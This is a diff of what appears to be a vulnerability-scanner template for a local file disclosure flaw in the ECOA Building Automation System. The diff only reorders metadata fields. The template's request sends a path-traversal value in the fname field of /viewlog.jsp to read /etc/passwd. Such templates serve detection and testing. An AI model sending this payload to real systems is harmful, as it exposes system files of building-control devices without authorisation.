--- a/ecoa-building-automation-lfd.yaml
+++ b/ecoa-building-automation-lfd.yaml
@@ -1,17 +1,16 @@
 id: ecoa-building-automation-lfd
-info: 
-  author: 0x_Akoko
+info:
   name: "ECOA Building Automation System Local File Disclosure"
-  reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php"
+  author: 0x_Akoko
   severity: high
-  tags: "ecoa,lfi"
+  reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php"
+  tags: ecoa,lfi
 
 requests:
   - raw:
       - |
         POST /viewlog.jsp HTTP/1.1
         Host: {{Hostname}}
-
 
         yr=2021&mh=6&fname=../../../../../../../../etc/passwd
 
